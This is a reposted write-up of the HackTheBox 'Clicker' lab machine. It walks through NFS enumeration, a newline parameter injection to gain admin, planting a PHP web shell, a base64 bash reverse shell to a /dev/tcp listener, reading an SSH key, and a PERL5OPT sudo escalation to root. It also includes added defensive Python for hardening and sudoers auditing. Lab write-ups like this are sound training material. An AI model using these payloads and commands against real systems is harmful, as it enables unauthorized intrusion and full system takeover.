Clicker — HackTheBox Machine Simple Writeup by Karthikeyan Nagaraj | 2024
2024-2-2 12:12:23 Author: infosecwriteups.com (view original) Reads: 15

HackTheBox’s Medium Machine — Clicker | Approach and Walkthrough with Hints

Karthikeyan Nagaraj

InfoSec Write-ups

  1. Enumeration and Analysis
  2. Initial Foothold
    1. Port — 2049
    2. Port — 80
    3. User.txt
    4. Alternate Option to get into the Machine
  3. Privilege Escalation
  4. Simple Video PoC (for section 2.4)

Note: I’m unable to do an elaborate writeup for now; I hope to post one soon.

Enumeration and Analysis

  1. Start the VPN and perform a basic Nmap scan:
    nmap -sC -sV 10.10.11.232
  2. Open 10.10.11.232 in a browser; it will show the hostname after the redirection.
  3. Now, add the hostname to the /etc/hosts file using the following command to access clicker.htb:
    echo "10.10.11.232 clicker.htb" | sudo tee -a /etc/hosts
  4. Then, perform a directory enumeration using the following command:
    dirsearch -u clicker.htb -e*
    (or)
    gobuster dir -u http://clicker.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
  5. Similarly, perform a DNS enumeration using the following command:
    gobuster dns -d clicker.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20

Initial Foothold

1. Port — 2049

  1. Let’s look at port 2049, which is used by the Network File System (NFS) for remote filesystem access. It's a client/server system that lets users access files across a network and treat them as if they were in a local directory.
  2. To list the network shares exported by the Clicker machine, execute the following command and look for potential entry points to investigate:
    showmount -e clicker.htb
  3. Then use the below commands to mount the shares
    sudo mkdir /mnt/nfs
    sudo mount clicker.htb:/ /mnt/nfs -o nolock
    cd /mnt/nfs/mnt/backups
    cp clicker.htb_backup.zip LOCATION_TO_UNZIP
  4. After unzipping the file, we can see the website's source code, which will be useful for inspecting the website.

2. Port — 80

  1. On enumerating the webpage and comparing it with the files we got from the victim machine, we find a flaw in the web application that lets us execute arbitrary commands.
  2. To do that, create an account and log in.
  3. Click Play, then turn on intercept in your proxy.
  4. Click save, capture the request, modify the parameters below, and send the request:
    /save_game.php?clicks=1&level=1&role%0a=Admin
  5. The above request will make us Admin. Log out and log in again, and you’ll see an Administrator panel.
  6. Click play and capture the request of the /save_game.php
  7. Now add the following parameter at the end of the request:
    &nickname=<%3fphp+system($_GET['cmd'])+%3f>
  8. Go to home, Click on Administration click Export, and capture the request.
  9. Change the extension to PHP and send the request.
  10. Open a Terminal and type nc -lvnp 4444 to start a listener.
  11. Open another terminal and enter the following command, replacing <your ip> with your IP:
    echo "sh -i >& /dev/tcp/<your ip>/4444 0>&1" | base64
  12. Now go to the link, adding the encoded reverse shell you got above and the filename that you exported:
    https://clicker.htb/exports/FILENAME.PHP?cmd=echo "<encoded base64 rev shell code>" | base64 -d | bash
  13. If you did everything right, you’ll get a reverse shell on the listener; otherwise, you can use section 4 (Alternate Option) to get into the machine.
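As an added, constructed illustration (not the Clicker source code and not the author's), the Python below mimics the two application flaws used in steps 4 and 7 to 9 beside hardened versions: a parameter-name blocklist that a trailing newline slips past, and a client-chosen export extension. Column names, the nickname policy and the export formats are assumptions.

```python
import re

ALLOWED_COLUMNS = {"clicks", "level", "nickname"}   # assumed: columns a player may update
NICKNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")    # assumed nickname policy
EXPORT_EXTENSIONS = {"txt": "txt", "json": "json", "html": "html"}  # assumed export formats


def build_update_vulnerable(params):
    """Reconstructed flawed logic: blocklist the name 'role', then splice every
    key unquoted into the SQL SET list. 'role\\n' is not equal to 'role', yet the
    SQL parser treats the trailing newline as whitespace after the identifier,
    so the role column is still updated."""
    assignments = []
    for key, value in params.items():
        if key.lower() == "role":                 # exact match only
            raise ValueError("role change not allowed")
        assignments.append(f"{key}='{value}'")    # key and value inlined, both unsafe
    return "UPDATE players SET " + ", ".join(assignments)


def build_update_hardened(params):
    """Allowlist exact column names and bind values through placeholders."""
    assignments, values = [], []
    for key, value in params.items():
        if key not in ALLOWED_COLUMNS:            # rejects 'role', 'role\n', 'role ' alike
            raise ValueError(f"unexpected parameter: {key!r}")
        assignments.append(f"{key}=%s")           # value bound by the DB driver, never inlined
        values.append(value)
    return "UPDATE players SET " + ", ".join(assignments), tuple(values)


def export_filename_vulnerable(base, extension):
    """Reconstructed flawed logic: the client picks the extension, so an export
    that embeds a stored nickname can be written under the web root as .php."""
    return f"exports/{base}.{extension}"


def export_filename_hardened(base, fmt):
    """Fixed map from export format to extension; unknown formats are refused."""
    if fmt not in EXPORT_EXTENSIONS:
        raise ValueError(f"unsupported export format: {fmt!r}")
    return f"exports/{base}.{EXPORT_EXTENSIONS[fmt]}"


def nickname_ok(nickname):
    """Server-side nickname validation; a PHP tag cannot satisfy this pattern."""
    return NICKNAME_RE.fullmatch(nickname) is not None
```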

3. User.txt

  1. On inspecting every directory, we find something interesting in the /opt/manage/ directory.
  2. It contains an executable used to read, modify, and update SQL statements, etc.
  3. We can use that to read the private SSH key of the user.
  4. Type the below commands to do that:
    cd /opt/manage/
    ./execute_query 5 ../.ssh/id_rsa
  5. Then it will display the SSH key of the user, copy that, and paste that into a file in your machine without any extension. Use
    nano KEY_FILENAME
  6. On your machine, type the following commands, making sure that the key is in the current directory:
    chmod 600 KEY_FILENAME
    ssh jack@clicker.htb -i KEY_FILENAME
  7. Now you can get the user.txt

4. Alternate Option to get into the Machine:

  1. I’m providing this section only for those who are making mistakes in getting into the machine. I hope you will use this section temporarily. Make sure to fix any mistakes that you have made in getting the reverse shell.
  2. So to get into the machine, you can use the SSH private key of the user jack which you can get here

  3. After you have downloaded the file, follow the steps in section 3 to get the user.txt.

Privilege Escalation

  1. Let’s start with sudo -l. The sudo -l command lists the allowed (or prohibited) commands for the invoking user on the current host, i.e. which commands the user may execute with elevated privileges.
  2. This reveals the script /opt/monitor.sh.
  3. On inspecting the file, we see that it is affected by the vulnerability known as Perl startup privilege escalation.
  4. Type the below commands to get root:
    sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
    bash -p
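As an added defensive check (not part of the original writeup), the Python below audits sudoers text for the conditions that let a caller-supplied variable such as PERL5OPT reach a sudo-run script: a SETENV tag, a command of ALL (which implies SETENV), or a Defaults env_keep that forwards Perl's startup variables. The sample sudoers lines are constructed, not taken from the machine.

```python
import re

# Variables Perl and the dynamic loader honour at startup; forwarding any of
# them through sudo lets the caller change what a privileged script executes.
DANGEROUS_VARS = {"PERL5OPT", "PERL5DB", "PERL5LIB", "PERLLIB", "LD_PRELOAD", "LD_LIBRARY_PATH"}

# Constructed sample configuration (not the real machine's sudoers).
SAMPLE_SUDOERS = """
Defaults env_reset
Defaults env_keep += "PERL5OPT PERL5DB"
jack ALL=(ALL) NOPASSWD: SETENV: /opt/monitor.sh   # SETENV: caller may pass VAR=value
admin ALL=(ALL) ALL                                # a command of ALL implies SETENV
www-data ALL=(root) NOPASSWD: /usr/bin/systemctl status nginx
"""

ENV_KEEP_RE = re.compile(r'^Defaults\s+env_keep\s*\+?=\s*"?([^"]*)"?\s*$')
RULE_RE = re.compile(r'^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.*)$')


def audit_sudoers(text):
    """Return (line_no, finding) tuples for settings that let callers inject env vars."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        m = ENV_KEEP_RE.match(line)
        if m:
            kept = sorted(set(m.group(1).split()) & DANGEROUS_VARS)
            if kept:
                findings.append((n, f"env_keep forwards {' '.join(kept)} to every sudo command"))
            continue
        if line.startswith("Defaults"):           # other Defaults lines are not rules
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, spec = m.group(1), m.group(2)
        parts = [p.strip() for p in spec.split(":")]   # "NOPASSWD: SETENV: /cmd" -> tags + command
        tags, command = set(parts[:-1]), parts[-1]
        if "SETENV" in tags:
            findings.append((n, f"{user}: SETENV tag lets the caller set any variable for {command}"))
        elif command == "ALL":
            findings.append((n, f"{user}: command ALL implies SETENV"))
    return findings
```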

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng


Source: https://infosecwriteups.com/clicker-hackthebox-machine-simple-writeup-by-karthikeyan-nagaraj-2024-313b383236bd?source=rss----7b722bfd1b8d---4